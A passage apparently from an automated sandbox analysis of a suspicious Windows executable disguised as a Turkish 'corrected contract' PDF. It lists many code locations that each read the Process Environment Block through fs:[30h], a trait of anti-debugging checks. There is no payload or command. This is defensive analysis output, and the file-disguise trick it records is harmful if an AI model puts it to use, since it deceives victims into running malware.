        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BA0680 mov eax, dword ptr fs:[00000030h]2_2_32BA0680
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BA0680 mov eax, dword ptr fs:[00000030h]2_2_32BA0680
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BA0680 mov eax, dword ptr fs:[00000030h]2_2_32BA0680
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BA0680 mov eax, dword ptr fs:[00000030h]2_2_32BA0680
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BA0680 mov eax, dword ptr fs:[00000030h]2_2_32BA0680
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BA0680 mov eax, dword ptr fs:[00000030h]2_2_32BA0680
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BA0680 mov eax, dword ptr fs:[00000030h]2_2_32BA0680
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BA0680 mov eax, dword ptr fs:[00000030h]2_2_32BA0680
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BA0680 mov eax, dword ptr fs:[00000030h]2_2_32BA0680
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BA0680 mov eax, dword ptr fs:[00000030h]2_2_32BA0680
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32C4F68C mov eax, dword ptr fs:[00000030h]2_2_32C4F68C
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32C1C691 mov eax, dword ptr fs:[00000030h]2_2_32C1C691
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32B896E0 mov eax, dword ptr fs:[00000030h]2_2_32B896E0
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32B896E0 mov eax, dword ptr fs:[00000030h]2_2_32B896E0
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32B9C6E0 mov eax, dword ptr fs:[00000030h]2_2_32B9C6E0
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32B956E0 mov eax, dword ptr fs:[00000030h]2_2_32B956E0
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32B956E0 mov eax, dword ptr fs:[00000030h]2_2_32B956E0
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32B956E0 mov eax, dword ptr fs:[00000030h]2_2_32B956E0
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BB66E0 mov eax, dword ptr fs:[00000030h]2_2_32BB66E0
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BB66E0 mov eax, dword ptr fs:[00000030h]2_2_32BB66E0
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32C0D69D mov eax, dword ptr fs:[00000030h]2_2_32C0D69D
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BBD6D0 mov eax, dword ptr fs:[00000030h]2_2_32BBD6D0
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32C586A8 mov eax, dword ptr fs:[00000030h]2_2_32C586A8
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32C586A8 mov eax, dword ptr fs:[00000030h]2_2_32C586A8
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32B906CF mov eax, dword ptr fs:[00000030h]2_2_32B906CF
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BCF63F mov eax, dword ptr fs:[00000030h]2_2_32BCF63F
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BCF63F mov eax, dword ptr fs:[00000030h]2_2_32BCF63F
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32B90630 mov eax, dword ptr fs:[00000030h]2_2_32B90630
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BC0630 mov eax, dword ptr fs:[00000030h]2_2_32BC0630
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32B97623 mov eax, dword ptr fs:[00000030h]2_2_32B97623
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32B95622 mov eax, dword ptr fs:[00000030h]2_2_32B95622
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32B95622 mov eax, dword ptr fs:[00000030h]2_2_32B95622
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BCC620 mov eax, dword ptr fs:[00000030h]2_2_32BCC620
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BC360F mov eax, dword ptr fs:[00000030h]2_2_32BC360F
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BBD600 mov eax, dword ptr fs:[00000030h]2_2_32BBD600
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BBD600 mov eax, dword ptr fs:[00000030h]2_2_32BBD600
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32C4F607 mov eax, dword ptr fs:[00000030h]2_2_32C4F607
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32C64600 mov eax, dword ptr fs:[00000030h]2_2_32C64600
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32B90670 mov eax, dword ptr fs:[00000030h]2_2_32B90670
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32C23608 mov eax, dword ptr fs:[00000030h]2_2_32C23608
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32C23608 mov eax, dword ptr fs:[00000030h]2_2_32C23608
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32C23608 mov eax, dword ptr fs:[00000030h]2_2_32C23608
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32C23608 mov eax, dword ptr fs:[00000030h]2_2_32C23608
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32C23608 mov eax, dword ptr fs:[00000030h]2_2_32C23608
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32C23608 mov eax, dword ptr fs:[00000030h]2_2_32C23608
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BD2670 mov eax, dword ptr fs:[00000030h]2_2_32BD2670
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BD2670 mov eax, dword ptr fs:[00000030h]2_2_32BD2670
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BC666D mov esi, dword ptr fs:[00000030h]2_2_32BC666D
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BC666D mov eax, dword ptr fs:[00000030h]2_2_32BC666D
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BC666D mov eax, dword ptr fs:[00000030h]2_2_32BC666D
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BA3660 mov eax, dword ptr fs:[00000030h]2_2_32BA3660
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BA3660 mov eax, dword ptr fs:[00000030h]2_2_32BA3660
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BA3660 mov eax, dword ptr fs:[00000030h]2_2_32BA3660
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32B87662 mov eax, dword ptr fs:[00000030h]2_2_32B87662
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32B87662 mov eax, dword ptr fs:[00000030h]2_2_32B87662
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32B87662 mov eax, dword ptr fs:[00000030h]2_2_32B87662
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BC265C mov eax, dword ptr fs:[00000030h]2_2_32BC265C
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BC265C mov ecx, dword ptr fs:[00000030h]2_2_32BC265C
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BC265C mov eax, dword ptr fs:[00000030h]2_2_32BC265C
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BC5654 mov eax, dword ptr fs:[00000030h]2_2_32BC5654
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32C3D62C mov ecx, dword ptr fs:[00000030h]2_2_32C3D62C
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32C3D62C mov ecx, dword ptr fs:[00000030h]2_2_32C3D62C
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32C3D62C mov eax, dword ptr fs:[00000030h]2_2_32C3D62C
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32B8D64A mov eax, dword ptr fs:[00000030h]2_2_32B8D64A
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32B8D64A mov eax, dword ptr fs:[00000030h]2_2_32B8D64A
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32C18633 mov esi, dword ptr fs:[00000030h]2_2_32C18633
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32C18633 mov eax, dword ptr fs:[00000030h]2_2_32C18633
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32C18633 mov eax, dword ptr fs:[00000030h]2_2_32C18633
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32B93640 mov eax, dword ptr fs:[00000030h]2_2_32B93640
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BAF640 mov eax, dword ptr fs:[00000030h]2_2_32BAF640
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BAF640 mov eax, dword ptr fs:[00000030h]2_2_32BAF640
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BAF640 mov eax, dword ptr fs:[00000030h]2_2_32BAF640
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BCC640 mov eax, dword ptr fs:[00000030h]2_2_32BCC640
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BCC640 mov eax, dword ptr fs:[00000030h]2_2_32BCC640
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32C4F7CF mov eax, dword ptr fs:[00000030h]2_2_32C4F7CF
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32B907A7 mov eax, dword ptr fs:[00000030h]2_2_32B907A7
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BC1796 mov eax, dword ptr fs:[00000030h]2_2_32BC1796
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BC1796 mov eax, dword ptr fs:[00000030h]2_2_32BC1796
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32B977F9 mov eax, dword ptr fs:[00000030h]2_2_32B977F9
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32B977F9 mov eax, dword ptr fs:[00000030h]2_2_32B977F9
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32C6B781 mov eax, dword ptr fs:[00000030h]2_2_32C6B781
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32C6B781 mov eax, dword ptr fs:[00000030h]2_2_32C6B781
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BBE7E0 mov eax, dword ptr fs:[00000030h]2_2_32BBE7E0
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32B937E4 mov eax, dword ptr fs:[00000030h]2_2_32B937E4
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32B937E4 mov eax, dword ptr fs:[00000030h]2_2_32B937E4
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32B937E4 mov eax, dword ptr fs:[00000030h]2_2_32B937E4
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32B937E4 mov eax, dword ptr fs:[00000030h]2_2_32B937E4
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32B937E4 mov eax, dword ptr fs:[00000030h]2_2_32B937E4
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32B937E4 mov eax, dword ptr fs:[00000030h]2_2_32B937E4
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32B937E4 mov eax, dword ptr fs:[00000030h]2_2_32B937E4
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32C0E79D mov eax, dword ptr fs:[00000030h]2_2_32C0E79D
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32C0E79D mov eax, dword ptr fs:[00000030h]2_2_32C0E79D
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32C0E79D mov eax, dword ptr fs:[00000030h]2_2_32C0E79D
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32C0E79D mov eax, dword ptr fs:[00000030h]2_2_32C0E79D
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32C0E79D mov eax, dword ptr fs:[00000030h]2_2_32C0E79D
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32C0E79D mov eax, dword ptr fs:[00000030h]2_2_32C0E79D
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32C0E79D mov eax, dword ptr fs:[00000030h]2_2_32C0E79D
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32C0E79D mov eax, dword ptr fs:[00000030h]2_2_32C0E79D
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32C0E79D mov eax, dword ptr fs:[00000030h]2_2_32C0E79D
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32C5D7A7 mov eax, dword ptr fs:[00000030h]2_2_32C5D7A7
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32C5D7A7 mov eax, dword ptr fs:[00000030h]2_2_32C5D7A7
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32C5D7A7 mov eax, dword ptr fs:[00000030h]2_2_32C5D7A7
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32C617BC mov eax, dword ptr fs:[00000030h]2_2_32C617BC
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32C3E750 mov eax, dword ptr fs:[00000030h]2_2_32C3E750
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BB9723 mov eax, dword ptr fs:[00000030h]2_2_32BB9723
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32B93722 mov eax, dword ptr fs:[00000030h]2_2_32B93722
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32B93722 mov eax, dword ptr fs:[00000030h]2_2_32B93722
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32B9471B mov eax, dword ptr fs:[00000030h]2_2_32B9471B
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32B9471B mov eax, dword ptr fs:[00000030h]2_2_32B9471B
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BB270D mov eax, dword ptr fs:[00000030h]2_2_32BB270D
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BB270D mov eax, dword ptr fs:[00000030h]2_2_32BB270D
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BB270D mov eax, dword ptr fs:[00000030h]2_2_32BB270D
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32B9D700 mov ecx, dword ptr fs:[00000030h]2_2_32B9D700
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32B8B705 mov eax, dword ptr fs:[00000030h]2_2_32B8B705
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32B8B705 mov eax, dword ptr fs:[00000030h]2_2_32B8B705
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32B8B705 mov eax, dword ptr fs:[00000030h]2_2_32B8B705
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32B8B705 mov eax, dword ptr fs:[00000030h]2_2_32B8B705
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32B94779 mov eax, dword ptr fs:[00000030h]2_2_32B94779
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32B94779 mov eax, dword ptr fs:[00000030h]2_2_32B94779
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BC0774 mov eax, dword ptr fs:[00000030h]2_2_32BC0774
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32C4F717 mov eax, dword ptr fs:[00000030h]2_2_32C4F717
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BA2760 mov ecx, dword ptr fs:[00000030h]2_2_32BA2760
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BD1763 mov eax, dword ptr fs:[00000030h]2_2_32BD1763
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BD1763 mov eax, dword ptr fs:[00000030h]2_2_32BD1763
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BD1763 mov eax, dword ptr fs:[00000030h]2_2_32BD1763
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BD1763 mov eax, dword ptr fs:[00000030h]2_2_32BD1763
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BD1763 mov eax, dword ptr fs:[00000030h]2_2_32BD1763
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BD1763 mov eax, dword ptr fs:[00000030h]2_2_32BD1763
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32B8F75B mov eax, dword ptr fs:[00000030h]2_2_32B8F75B
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32B8F75B mov eax, dword ptr fs:[00000030h]2_2_32B8F75B
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32B8F75B mov eax, dword ptr fs:[00000030h]2_2_32B8F75B
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32B8F75B mov eax, dword ptr fs:[00000030h]2_2_32B8F75B
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32B8F75B mov eax, dword ptr fs:[00000030h]2_2_32B8F75B
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32B8F75B mov eax, dword ptr fs:[00000030h]2_2_32B8F75B
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32B8F75B mov eax, dword ptr fs:[00000030h]2_2_32B8F75B
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32B8F75B mov eax, dword ptr fs:[00000030h]2_2_32B8F75B
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32B8F75B mov eax, dword ptr fs:[00000030h]2_2_32B8F75B
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BCA750 mov eax, dword ptr fs:[00000030h]2_2_32BCA750
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BB2755 mov eax, dword ptr fs:[00000030h]2_2_32BB2755
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BB2755 mov eax, dword ptr fs:[00000030h]2_2_32BB2755
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BB2755 mov eax, dword ptr fs:[00000030h]2_2_32BB2755
